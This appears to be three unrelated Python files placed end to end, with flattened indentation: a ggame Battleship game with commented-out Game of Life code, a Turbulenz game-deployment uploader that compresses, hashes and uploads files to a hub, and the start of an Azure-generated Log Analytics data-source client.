Sprite(rectangle2, (x*celld, y*celld))
enemyBoats[(x,y)] = enemyships(rectangle3, (x*celld, y*celld))
ocean[(x,y)] = cell(rectangle, (x*celld, y*celld))
#screen two set up
yshift = height*celld + 20
Sprite(rectangle2, (x*celld, y*celld + yshift))
selfBoats[(x,y+10)] = cell(rectangle5, (x*celld, y*celld + yshift))
selfBoatssunk[(x,y+10)] = cell(rectangle3, (x*celld, y*celld + yshift))
oceanself[(x,y+10)] = cell(rectangle, (x*celld, y*celld + yshift))
while overlapping == True:
shipsmadevisible = 0
for aaa in range(0, height):
for bbb in range(0, width):
enemyBoats[(aaa,bbb)].visible = False
for a in range(0, 3):
randx = randrange(1, 10)
randy = randrange(1, 10)
if randx > 5:
nsx = -1
else:
nsx = 1
if randy > 5:
nsy = -1
else:
nsy = 1
randxy = randrange(1, 3)
for u in range(0, length-1):
enemyBoats[(randx+nsx,randy+nsy)].visible = True
enemyboatsalive[(randx+nsx,randy+nsy)] = (randx+nsx,randy+nsy)
if randxy == 2:
randx = randx + 1
else:
randy = randy + 1
length = length - 1
for aa in range(0, height):
for bb in range(0, width):
if enemyBoats[(aa,bb)].visible == True:
shipsmadevisible =shipsmadevisible + 1
if shipsmadevisible == 9:
overlapping = False
class Battleship(App):
def __init__(self):
Battleship.listenKeyEvent("keydown", "space", self.spaceclick)
SCREEN_WIDTH = 1000
SCREEN_HEIGHT = 1000
self.going = False
self.squarehit = 0
self.playerturn = True
self.nonalcoholicshotstaken = 0
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT)
Battleship.listenMouseEvent("click",self.breathlife)
def spaceclick(self,event):
self.going = True
def breathlife(self, event):
self.cx = int(event.x/celld)
self.cy = int(event.y/celld)
if self.playerturn == True:
if self.going == False:
if (self.cx, self.cy-1) in oceanself:
oceanself[(self.cx, self.cy-1)].visible = not oceanself[(self.cx, self.cy-1)].visible
selfBoats[(self.cx,self.cy-1)].visible = not selfBoats[(self.cx,self.cy-1)].visible
selfBoatsalive[(self.cx,self.cy-1)] = (self.cx,self.cy-1)
else:
if (self.cx, self.cy) in ocean:
ocean[(self.cx, self.cy)].visible = False
if (self.cx, self.cy) in enemyboatsalive and (self.cx, self.cy) not in enemyboatsunk:
self.squarehit = self.squarehit + 1
enemyboatsunk[self.cx, self.cy] = "hit"
if self.going == True:
self.playerturn = False
self.nonalcoholicshotstaken = self.nonalcoholicshotstaken + 1
def step(self):
if self.squarehit == 9:
for j in range(0, height):
for k in range(0, width):
ocean[(j,k)].visible = False
if self.going == True:
if self.playerturn == False:
#while shooting == False:
randshotx = randrange(0, 10)
randshoty = randrange(10, 20)
#if (randshotx, randshoty) not in cpushots:
#shooting = True
cpushots[(randshotx, randshoty)] = (randshotx, randshoty)
print("shots fired")
oceanself[(randshotx, randshoty)].visible = False
if (randshotx, randshoty) in selfBoatsalive:
selfBoats[(randshotx, randshoty)].visible = False
selfBoatssunk[(randshotx, randshoty)].visible = True
print("hit")
self.playerturn = True
myapp = Battleship()
myapp.run()
"""
from ggame import App, RectangleAsset, ImageAsset, Sprite, LineStyle, Color, Frame
black = Color(0x000000, 1.0)
green = Color(0x00ff00, 1.0)
orange = Color(0xFF8400,1.0)
thinline = LineStyle(1, black)
a = 0
b = 0
height = 20
width = 20
ocean = {}
thinline = LineStyle(1, black)
rectangle = RectangleAsset(20, 20, thinline, green)
rectangle2 = RectangleAsset(20, 20, thinline, orange)
class cell(Sprite):
def __init__(self, asset, position):
super().__init__(asset, position)
self.visible = False
self.sca = 0
for x in range(0, height):
for y in range(0, width):
Sprite(rectangle2, (x*height, y*width))
ocean[(x,y)] = cell(rectangle, (x*height, y*width))
class ConwayGame(App):
def __init__(self):
ConwayGame.listenKeyEvent("keydown", "space", self.spaceclick)
SCREEN_WIDTH = 640
SCREEN_HEIGHT = 480
self.going = False
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT)
ConwayGame.listenMouseEvent("click",self.breathlife)
def breathlife(self, event):
self.cx = int(event.x/20)
self.cy = int(event.y/20)
ocean[(self.cx, self.cy)].visible = not ocean[(self.cx, self.cy)].visible
def spaceclick(self,event):
self.going = not self.going
def step(self):
if self.going == True:
for g in range(0, height):
for f in range(0, width):
if ocean[(g,f)].visible == True:
ocean[(g,f)].sca = ocean[(g,f)].sca - 1
for w in range(-1, 2):
for h in range(-1, 2):
if (w+g, h+f) in ocean and ocean[(w+g, h+f)].visible == True:
ocean[(g,f)].sca = ocean[(g,f)].sca + 1
for s in range(0, height):
for d in range(0, width):
if ocean[(s, d)].visible == True and ocean[(s, d)].sca < 2:
ocean[(s, d)].visible = False
elif ocean[(s, d)].visible == True and ocean[(s, d)].sca > 3:
ocean[(s, d)].visible = False
elif ocean[(s, d)].visible == False and ocean[(s, d)].sca == 3:
ocean[(s, d)].visible = True
ocean[(s,d)].sca = 0
myapp = ConwayGame()
myapp.run()
"""
| |
# Copyright (c) 2010-2014 Turbulenz Limited
"""
Controller class for deploying a game
"""
from urllib3.exceptions import HTTPError, SSLError
from simplejson import dump as json_dump, load as json_load, loads as json_loads, JSONDecodeError
from os import stat, sep, error, rename, remove, makedirs, utime, access, R_OK, walk
from os.path import join, basename, abspath, splitext, sep, isdir, dirname
from errno import EEXIST
from stat import S_ISREG
from glob import iglob
from logging import getLogger
from mimetypes import guess_type
from gzip import GzipFile
from shutil import rmtree
from Queue import Queue
from threading import Thread
from time import time
from subprocess import Popen, PIPE
# pylint: disable=F0401
from poster.encode import gen_boundary, get_headers, MultipartParam
# pylint: enable=F0401
from turbulenz_local.tools import get_absolute_path, get_7zip_path
from turbulenz_tools.utils.hash import hash_file_sha256_md5, hash_file_sha256, hash_file_md5
from turbulenz_local import __version__
LOG = getLogger(__name__)
def _update_file_mtime(file_path, mtime):
# We round mtime up to the next second to avoid precision problems with floating point values
mtime = long(mtime) + 1
utime(file_path, (mtime, mtime))
def _get_upload_file_token(index, filename):
# We build the upload token using an index and the file extension since the hub doesn't care
# about the actual filename only the extension
return '%d%s' % (index, splitext(filename)[1])
def _get_cached_file_name(file_name, file_hash, file_length):
return '%s%x%s' % (file_hash, file_length, splitext(file_name)[1])
# pylint: disable=R0902
class Deployment(object):
_batch_checks = True
_empty_meta_data = {'length': 0,
'hash': '',
'md5': ''}
_base_check_url = '/dynamic/upload/check?'
_check_url_format = 'name=%s&hash=%s&length=%d'
_cached_hash_folder = '__cached_hashes__'
_cached_hash_ttl = (30 * 24 * 60 * 60) # 30 days
_do_not_compress = set([ 'ogg',
'png',
'jpeg',
'jpg',
'gif',
'ico',
'mp3',
'wav',
'swf',
'webm',
'mp4',
'm4v',
'm4a',
'aac' ])
_directories_to_ignore = set([ '.git',
'.hg',
'.svn' ])
def __init__(self, game, hub_pool, hub_project, hub_version, hub_versiontitle, hub_cookie, cache_dir):
self.path = abspath(get_absolute_path(game.path))
self.plugin_main = game.plugin_main
self.canvas_main = game.canvas_main
self.flash_main = game.flash_main
self.mapping_table = game.mapping_table
self.files = game.deploy_files.items
self.engine_version = game.engine_version
self.is_multiplayer = game.is_multiplayer
self.aspect_ratio = game.aspect_ratio
self.cache_dir = cache_dir
self.game_cache_dir = join(abspath(cache_dir), game.slug)
self.stopped = False
self.hub_project = hub_project
self.hub_version = hub_version
self.hub_versiontitle = hub_versiontitle
self.hub_session = None
self.hub_pool = hub_pool
self.hub_cookie = hub_cookie
self.hub_timeout = 200
self.total_files = 0
self.num_files = 0
self.num_bytes = 0
self.uploaded_files = 0
self.uploaded_bytes = 0
self.done = False
self.error = None
try:
makedirs(self.get_gzip_dir())
except OSError as e:
if e.errno != EEXIST:
LOG.error(str(e))
def get_meta_data_path(self):
return self.game_cache_dir + '.json.gz'
def get_gzip_dir(self):
return self.game_cache_dir.replace('\\', '/')
def deploy(self, ultra=False):
self.done = self.upload_files(ultra)
if self.hub_session:
headers = {'Cookie': self.hub_cookie}
fields = {'session': self.hub_session}
try:
if self.done:
self.hub_pool.request('POST',
'/dynamic/upload/end',
fields=fields,
headers=headers,
redirect=False,
retries=5,
timeout=self.hub_timeout)
else:
self.hub_pool.request('POST',
'/dynamic/upload/cancel',
fields=fields,
headers=headers,
redirect=False,
retries=5,
timeout=self.hub_timeout)
except (HTTPError, SSLError) as e:
LOG.error(e)
def cancel(self):
self.stopped = True
self.error = 'Canceled.'
def stop(self, error_msg):
self.stopped = True
self.error = error_msg
def read_metadata_cache(self):
try:
file_name = self.get_meta_data_path()
gzip_file = GzipFile(filename=file_name,
mode='rb')
meta_data_cache = json_load(gzip_file)
gzip_file.close()
cache_time = stat(file_name).st_mtime
except (IOError, ValueError):
cache_time = -1
meta_data_cache = {}
return cache_time, meta_data_cache
def write_metadata_cache(self, meta_data, force_mtime):
try:
file_path = self.get_meta_data_path()
gzip_file = GzipFile(filename=file_path,
mode='wb',
compresslevel=9)
json_dump(meta_data, gzip_file, separators=(',', ':'), sort_keys=True)
gzip_file.close()
if force_mtime > 0:
_update_file_mtime(file_path, force_mtime)
except (IOError, OSError):
pass
def delete_unused_cache_files(self, meta_data, meta_data_cache):
old_files_to_delete = (set(meta_data_cache.iterkeys()) - set(meta_data.iterkeys()))
if old_files_to_delete:
gzip_cache_dir = self.get_gzip_dir()
for relative_path in old_files_to_delete:
cache_file_name = '%s/%s.gz' % (gzip_cache_dir, relative_path)
if access(cache_file_name, R_OK):
remove(cache_file_name)
def batch_check_files(self, files, checked_queue_put):
urlopen = self.hub_pool.urlopen
base_url = self._base_check_url
url_format = self._check_url_format
get_upload_token = _get_upload_file_token
timeout = self.hub_timeout
if self._batch_checks:
query = '&'.join((url_format % (get_upload_token(i, f[1]), f[3], f[2])) for i, f in enumerate(files))
r = urlopen('GET',
base_url + query,
redirect=False,
assert_same_host=False,
timeout=timeout)
if r.status == 200:
# pylint: disable=E1103
missing_files = set(json_loads(r.data).get('missing', []))
# pylint: enable=E1103
for i, f in enumerate(files):
if get_upload_token(i, f[1]) in missing_files:
# Update meta data cache and upload
checked_queue_put(f)
else:
# Only needs to update meta data cache
checked_queue_put((f[1], f[2], f[3], f[4], f[5]))
return
else:
f = files.pop(0)
if r.status == 304:
# First one only needs to update meta data cache
checked_queue_put((f[1], f[2], f[3], f[4], f[5]))
elif r.status == 404:
# First one needs to update meta data cache and to upload
checked_queue_put(f)
else:
raise Exception(r.reason)
if len(files) == 1:
return
# Legacy format, check one by one...
self._batch_checks = False
r = None
for f in files:
query = url_format % (basename(f[1]), f[3], f[2])
if urlopen('GET',
base_url + query,
redirect=False,
assert_same_host=False,
timeout=timeout).status == 304:
# Only needs to update meta data cache
checked_queue_put((f[1], f[2], f[3], f[4], f[5]))
else:
# Update meta data cache and upload
checked_queue_put(f)
# pylint: disable=R0914,R0915
def check_files(self, files, start, end, checked_queue_put, hashes, ultra, cache_time, meta_data_cache):
files_to_batch_check = []
base_path_len = len(self.path)
if not self.path.endswith(sep):
base_path_len += 1
gzip_cache_dir = self.get_gzip_dir()
compressor_path = get_7zip_path()
empty_meta_data = self._empty_meta_data
get_cached_file_name = _get_cached_file_name
while start < end:
if self.stopped:
checked_queue_put(None) # Make sure the waiting thread wakes up
break
abs_path = files[start]
start += 1
relative_path = abs_path[base_path_len:]
try:
file_stat = stat(abs_path)
file_size = file_stat.st_size
if not S_ISREG(file_stat.st_mode) or file_size <= 0: # Not a valid file
checked_queue_put(relative_path)
continue
calculate_hash = update_meta_data = False
file_time = max(file_stat.st_mtime, file_stat.st_ctime)
if cache_time < file_time:
calculate_hash = True
else:
old_meta_data = meta_data_cache.get(relative_path, empty_meta_data)
if file_size != old_meta_data['length']:
calculate_hash = True
else:
file_hash = old_meta_data['hash']
file_md5 = old_meta_data['md5']
# Avoid compressing some files because they either already use 'deflate' or
# because the browser needs them uncompressed
if relative_path.split('.')[-1] not in self._do_not_compress:
deploy_file_name = '%s/%s.gz' % (gzip_cache_dir, relative_path)
do_compress = False
try:
file_stat = stat(deploy_file_name)
if file_stat.st_mtime < file_time:
do_compress = True
elif file_stat.st_size >= file_size:
deploy_file_name = abs_path
except error:
do_compress = True
if do_compress:
if compressor_path:
if ultra:
process = Popen([compressor_path,
'a', '-tgzip',
'-mx=9', '-mfb=257', '-mpass=15',
deploy_file_name, abs_path],
stdout=PIPE, stderr=PIPE)
else:
process = Popen([compressor_path,
'a', '-tgzip',
deploy_file_name, abs_path],
stdout=PIPE, stderr=PIPE)
update_meta_data = True
if calculate_hash:
calculate_hash = False
file_hash = hash_file_sha256(abs_path)
output, _ = process.communicate()
if process.poll():
self.stop('Error compressing file "%s": "%s".' % (relative_path, str(output)))
continue
else:
try:
if stat(deploy_file_name).st_size >= file_size:
deploy_file_name = abs_path
except error as e:
self.stop('Error opening compressed file "%s": "%s".' % (deploy_file_name, str(e)))
continue
file_md5 = hash_file_md5(deploy_file_name)
else:
# Compress with Python gzip, will warn that 7zip is preferred
cache_dir = dirname(deploy_file_name)
try:
makedirs(cache_dir)
except OSError as e:
if e.errno != EEXIST:
self.stop('Error compressing file "%s": "%s".' % (relative_path, str(e)))
continue
try:
with GzipFile(deploy_file_name, mode='wb', compresslevel=9) as gzipfile:
with open(abs_path, 'rb') as f:
gzipfile.write(f.read())
except IOError as e:
self.stop('Error compressing file "%s": "%s".' % (relative_path, str(e)))
continue
LOG.warning('Using Python for GZip compression, install 7zip for optimal performance')
update_meta_data = True
if calculate_hash:
calculate_hash = False
file_hash = hash_file_sha256(abs_path)
try:
if stat(deploy_file_name).st_size >= file_size:
deploy_file_name = abs_path
except error as e:
self.stop('Error opening compressed file "%s": "%s".' % (deploy_file_name, str(e)))
continue
file_md5 = hash_file_md5(deploy_file_name)
else:
deploy_file_name = abs_path
if calculate_hash:
update_meta_data = True
if deploy_file_name == abs_path:
file_hash, file_md5 = hash_file_sha256_md5(abs_path)
else:
file_hash = hash_file_sha256(abs_path)
file_md5 = hash_file_md5(deploy_file_name)
if get_cached_file_name(relative_path, file_hash, file_size) not in hashes:
file_item = (deploy_file_name, relative_path, file_size, file_hash, file_md5, file_time)
files_to_batch_check.append(file_item)
if len(files_to_batch_check) >= 10:
self.batch_check_files(files_to_batch_check, checked_queue_put)
files_to_batch_check = []
elif update_meta_data:
checked_queue_put((relative_path, file_size, file_hash, file_md5, file_time))
else:
checked_queue_put((relative_path, file_size, file_hash, file_time)) # Nothing to do
file_stat = None
except (error, IOError) as e:
self.stop('Error opening file "%s": "%s".' % (relative_path, str(e)))
except Exception as e:
self.stop('Error checking file "%s": "%s".' % (relative_path, str(e)))
if len(files_to_batch_check) > 0:
try:
self.batch_check_files(files_to_batch_check, checked_queue_put)
except (HTTPError, SSLError, ValueError) as e:
self.stop('Error checking files: "%s".' % str(e))
except Exception as e:
self.stop('Error checking files: "%s".' % str(e))
# pylint: enable=R0914,R0915
def find_files(self):
files = set()
path = self.path
directories_to_ignore = self._directories_to_ignore
for pattern in self.files:
if pattern:
for abs_path in iglob(join(path, pattern)):
if isdir(abs_path):
for tmp_root, dir_names, list_of_files in walk(abs_path):
if dir_names:
# Filter subdirectories by updating the given list inplace
dir_names[:] = (dirname for dirname in dir_names
if dirname not in directories_to_ignore)
# Fix filenames and add them to the set
files.update(join(tmp_root, filename).replace('\\', '/') for filename in list_of_files)
else:
files.add(abs_path.replace('\\', '/'))
return list(files)
def load_hashes(self, project):
hashes = set()
try:
# Files containing cached hashes are stored in a folder called "__cached_hashes__".
# The name of the file contains the creation time
# so we skip files that are too old
hashes_folder = join(self.cache_dir, self._cached_hash_folder)
stale_time = long(time() - self._cached_hash_ttl) # 30 days
for file_path in iglob(join(hashes_folder, '*.json')):
delete_file = True
try:
file_time = long(splitext(basename(file_path))[0])
if stale_time < file_time:
file_obj = open(file_path, 'rb')
hashes_meta = json_load(file_obj)
file_obj.close()
# pylint: disable=E1103
hashes_version = hashes_meta.get('version', 0)
if 2 <= hashes_version:
cached_hashes = hashes_meta.get('hashes', None)
if cached_hashes:
delete_file = False
hashes_host = hashes_meta.get('host', None)
if hashes_host == self.hub_pool.host:
hashes.update(cached_hashes)
# pylint: enable=E1103
except (TypeError, ValueError):
pass
if delete_file:
LOG.info('Deleting stale cache file: %s', file_path)
remove(file_path)
except (IOError, error):
pass
except Exception as e:
LOG.error(str(e))
hashes.update(self.request_hashes(project))
return hashes
def request_hashes(self, project):
try:
min_version = 2
r = self.hub_pool.urlopen('GET',
'/dynamic/upload/list?version=%d&project=%s' % (min_version, project),
headers={'Cookie': self.hub_cookie,
'Accept-Encoding': 'gzip'},
redirect=False,
assert_same_host=False,
timeout=self.hub_timeout)
if r.status == 200:
response = json_loads(r.data)
# pylint: disable=E1103
if response.get('version', 1) >= min_version:
return response['hashes']
# pylint: enable=E1103
except (HTTPError, SSLError, TypeError, ValueError):
pass
except Exception as e:
LOG.error(str(e))
return []
def save_hashes(self, hashes):
try:
hashes_folder = join(self.cache_dir, self._cached_hash_folder)
try:
makedirs(hashes_folder)
except OSError as e:
if e.errno != EEXIST:
LOG.error(str(e))
return
# Load existing cache and only save the delta
for file_path in iglob(join(hashes_folder, '*.json')):
try:
file_obj = open(file_path, 'rb')
hashes_meta = json_load(file_obj)
file_obj.close()
hashes_host = hashes_meta['host']
if hashes_host == self.hub_pool.host:
hashes.difference_update(hashes_meta['hashes'])
except (IOError, TypeError, ValueError, KeyError, AttributeError):
pass
if hashes:
try:
file_path = join(hashes_folder, '%d.json' % long(time()))
file_obj = open(file_path, 'wb')
hashes_meta = {'version': 2,
'host': self.hub_pool.host,
'hashes': list(hashes)}
json_dump(hashes_meta, file_obj, separators=(',', ':'))
file_obj.close()
except IOError:
pass
# pylint: disable=W0703
except Exception as e:
LOG.error(str(e))
# pylint: enable=W0703
def start_scan_workers(self, files, checked_queue, hashes, ultra, cache_time, meta_data_cache):
num_files = len(files)
num_workers = 4
if num_workers > num_files:
num_workers = num_files
start = 0
step = int((num_files + (num_workers - 1)) / num_workers)
for _ in range(num_workers):
end = (start + step)
if end > num_files:
end = num_files
Thread(target=self.check_files, args=[files, start, end,
checked_queue.put,
hashes, ultra, cache_time, meta_data_cache]).start()
start = end
# pylint: disable=R0914
def scan_files(self, hashes, ultra):
files = self.find_files()
num_files = len(files)
self.total_files = num_files
cache_time, meta_data_cache = self.read_metadata_cache()
checked_queue = Queue()
self.start_scan_workers(files, checked_queue, hashes, ultra, cache_time, meta_data_cache)
files_scanned = []
files_to_upload = []
meta_data = {}
update_meta_data = False
newer_time = -1
while True:
item = checked_queue.get()
if item is None or self.stopped: # Stop event
break
elif isinstance(item, basestring): # Invalid file
num_files -= 1
else:
if len(item) == 4: # Nothing to do for this file
relative_path, file_size, file_hash, file_time = item
meta_data[relative_path] = meta_data_cache[relative_path]
files_scanned.append((relative_path, file_size, file_hash))
else:
if len(item) == 5: # Only need to update meta data cache
relative_path, file_size, file_hash, file_md5, file_time = item
files_scanned.append((relative_path, file_size, file_hash))
else: # Need to upload too
deploy_path, relative_path, file_size, file_hash, file_md5, file_time = item
files_to_upload.append((deploy_path, relative_path, file_size, file_hash, file_md5))
meta_data[relative_path] = {'length': file_size,
'hash': file_hash,
'md5': file_md5}
update_meta_data = True
if newer_time < file_time:
newer_time = file_time
self.num_bytes += file_size
self.num_files += 1
if self.num_files >= num_files:
break
item = None
if self.stopped:
# Copy old data to avoid recalculations
meta_data.update(meta_data_cache)
if update_meta_data or newer_time > cache_time or len(meta_data) != len(meta_data_cache):
self.write_metadata_cache(meta_data, newer_time)
self.delete_unused_cache_files(meta_data, meta_data_cache)
return files_scanned, files_to_upload
# pylint: enable=R0914
def update_num_bytes(self, x):
self.num_bytes += len(x)
def post(self, url, params, boundary):
headers = get_headers(params, boundary)
headers['Cookie'] = self.hub_cookie
params = MultipartParam.from_params(params)
return self.hub_pool.urlopen('POST',
url,
MultipartReader(params, boundary),
headers=headers,
timeout=self.hub_timeout)
# pylint: disable=R0914
def post_files(self, files, start, end, uploaded_queue_put, boundary, local_deploy):
hub_session = self.hub_session
hub_cookie = self.hub_cookie
hub_pool = self.hub_pool
while start < end:
if self.stopped:
uploaded_queue_put(None) # Make sure the waiting thread wakes up
break
item = files[start]
start += 1
deploy_path, relative_path, file_size, file_hash, file_md5 = item
try:
if local_deploy:
guessed_type = guess_type(relative_path)[0]
if guessed_type is None:
guessed_type = ""
params = {'file.content_type': guessed_type,
'file.name': relative_path,
'file.path': deploy_path,
'session': hub_session,
'hash': file_hash,
'length': str(file_size),
'md5': file_md5}
if deploy_path.endswith('.gz'):
params['encoding'] = 'gzip'
r = hub_pool.request('POST',
'/dynamic/upload/file',
fields=params,
headers={'Cookie': hub_cookie},
timeout=self.hub_timeout)
else:
params = [MultipartParam('file',
filename=relative_path,
filetype=guess_type(relative_path)[0],
fileobj=open(deploy_path, 'rb')),
('session', hub_session),
('hash', file_hash),
('length', file_size),
('md5', file_md5)]
if deploy_path.endswith('.gz'):
params.append(('encoding', 'gzip'))
headers = get_headers(params, boundary)
headers['Cookie'] = hub_cookie
params = MultipartParam.from_params(params)
params = MultipartReader(params, boundary)
r = hub_pool.urlopen('POST',
'/dynamic/upload/file',
params,
headers=headers,
timeout=self.hub_timeout)
except IOError:
self.stop('Error opening file "%s".' % deploy_path)
continue
except (HTTPError, SSLError, ValueError) as e:
self.stop('Error uploading file "%s": "%s".' % (relative_path, e))
continue
if r.headers.get('content-type', '') != 'application/json; charset=utf-8':
self.stop('Hub error uploading file "%s".' % relative_path)
continue
answer = json_loads(r.data)
# pylint: disable=E1103
if r.status != 200:
if answer.get('corrupt', False):
self.stop('File "%s" corrupted on transit.' % relative_path)
else:
msg = answer.get('msg', None)
if msg:
self.stop('Error when uploading file "%s".\n%s' % (relative_path, msg))
else:
self.stop('Error when uploading file "%s": "%s"' % (relative_path, r.reason))
continue
if not answer.get('ok', False):
self.stop('Error uploading file "%s".' % relative_path)
continue
# pylint: enable=E1103
uploaded_queue_put((relative_path, file_size, file_hash))
answer = None
r = None
params = None
relative_path = None
deploy_path = None
item = None
# pylint: enable=R0914
def start_upload_workers(self, files, uploaded_queue, boundary, local_deploy):
num_files = len(files)
num_workers = 4
if num_workers > num_files:
num_workers = num_files
start = 0
step = int((num_files + (num_workers - 1)) / num_workers)
for _ in range(num_workers):
end = (start + step)
if end > num_files:
end = num_files
Thread(target=self.post_files, args=[files, start, end, uploaded_queue.put, boundary, local_deploy]).start()
start = end
def upload_files(self, ultra):
hashes = self.load_hashes(self.hub_project)
files_scanned, files_to_upload = self.scan_files(hashes, ultra)
if self.stopped:
return False
num_files = self.num_files
if num_files <= 0:
return True
boundary = gen_boundary()
local_deploy = self.hub_pool.host in ['127.0.0.1', '0.0.0.0', 'localhost']
try:
if local_deploy:
params = {'files.path': self.get_meta_data_path(),
'encoding': 'gzip',
'project': self.hub_project,
'version': self.hub_version,
'versiontitle': self.hub_versiontitle,
'pluginmain': self.plugin_main,
'canvasmain': self.canvas_main,
'flashmain': self.flash_main,
'mappingtable': self.mapping_table,
'engineversion': self.engine_version,
'ismultiplayer': self.is_multiplayer,
'aspectratio': self.aspect_ratio,
'numfiles': str(num_files),
'numbytes': str(self.num_bytes),
'localversion': __version__}
r = self.hub_pool.request('POST',
'/dynamic/upload/begin',
fields=params,
headers={'Cookie': self.hub_cookie},
timeout=self.hub_timeout)
else:
r = self.post('/dynamic/upload/begin',
[MultipartParam('files',
filename='files.json',
filetype='application/json; charset=utf-8',
fileobj=open(self.get_meta_data_path(), 'rb')),
('encoding', 'gzip'),
('project', self.hub_project),
('version', self.hub_version),
('versiontitle', self.hub_versiontitle),
('pluginmain', self.plugin_main),
('canvasmain', self.canvas_main),
('flashmain', self.flash_main),
('mappingtable', self.mapping_table),
('engineversion', self.engine_version),
('ismultiplayer', self.is_multiplayer),
('aspectratio', self.aspect_ratio),
('numfiles', num_files),
('numbytes', self.num_bytes),
('localversion', __version__)],
boundary)
except IOError:
self.stop('Error opening file "%s".' % self.get_meta_data_path())
return False
except (HTTPError, SSLError) as e:
self.stop('Error starting upload: "%s".' % e)
return False
if r.status == 504:
self.stop('Hub timed out.')
return False
if r.headers.get('content-type', '') == 'application/json; charset=utf-8' and r.data != '':
try:
answer = json_loads(r.data)
except JSONDecodeError as e:
LOG.error(e)
answer = {}
else:
answer = {}
if r.status != 200:
msg = answer.get('msg', False)
if msg:
self.stop(msg)
else:
self.stop('Error starting upload: "%s".' % r.reason)
return False
hub_session = answer.get('session', None)
if not answer.get('ok', False) or not hub_session:
self.stop('Unsupported response format from Hub.')
return False
self.hub_session = hub_session
get_cached_file_name = _get_cached_file_name
for file_name, file_size, file_hash in files_scanned:
hashes.add(get_cached_file_name(file_name, file_hash, file_size))
self.uploaded_bytes += file_size
self.uploaded_files += 1
if self.uploaded_files >= num_files:
self.save_hashes(hashes)
return True
# we only reach this code if there are files to upload
uploaded_queue = Queue()
self.start_upload_workers(files_to_upload, uploaded_queue, boundary, local_deploy)
while True:
item = uploaded_queue.get()
if item is None or self.stopped:
break
file_name, file_size, file_hash = item
hashes.add(get_cached_file_name(file_name, file_hash, file_size))
self.uploaded_bytes += file_size
self.uploaded_files += 1
if self.uploaded_files >= num_files:
self.save_hashes(hashes)
return True
item = None
self.save_hashes(hashes)
return False
@classmethod
def rename_cache(cls, cache_dir, old_slug, new_slug):
old_file = join(cache_dir, old_slug) + '.json.gz'
new_file = join(cache_dir, new_slug) + '.json.gz'
old_folder = join(cache_dir, old_slug)
new_folder = join(cache_dir, new_slug)
# delete the new folder is necessary, otherwise the
# old one will just end up inside of it
try:
remove(new_file)
rmtree(new_folder)
except OSError:
pass
try:
rename(old_file, new_file)
rename(old_folder, new_folder)
except OSError:
pass
# pylint: enable=R0902
class MultipartReader(object):
def __init__(self, params, boundary):
self.params = params
self.boundary = boundary
self.i = 0
self.param = None
self.param_iter = None
def read(self, blocksize):
"""generator function to return multipart/form-data representation
of parameters"""
if self.param_iter is not None:
try:
return self.param_iter.next()
except StopIteration:
self.param = None
self.param_iter = None
if self.i is None:
return None
elif self.i >= len(self.params):
self.param_iter = None
self.param = None
self.i = None
return "--%s--\r\n" % self.boundary
self.param = self.params[self.i]
self.param_iter = self.param.iter_encode(self.boundary, blocksize)
self.i += 1
return self.read(blocksize)
def reset(self):
self.i = 0
for param in self.params:
param.reset()
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_create_or_update_request(
resource_group_name: str,
workspace_name: str,
data_source_name: str,
subscription_id: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"workspaceName": _SERIALIZER.url("workspace_name", workspace_name, 'str', max_length=63, min_length=4, pattern=r'^[A-Za-z0-9][A-Za-z0-9-]+[A-Za-z0-9]$'),
"dataSourceName": _SERIALIZER.url("data_source_name", data_source_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
def build_delete_request(
resource_group_name: str,
workspace_name: str,
data_source_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-08-01"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"workspaceName": _SERIALIZER.url("workspace_name", workspace_name, 'str', max_length=63, min_length=4, pattern=r'^[A-Za-z0-9][A-Za-z0-9-]+[A-Za-z0-9]$'),
"dataSourceName": _SERIALIZER.url("data_source_name", data_source_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
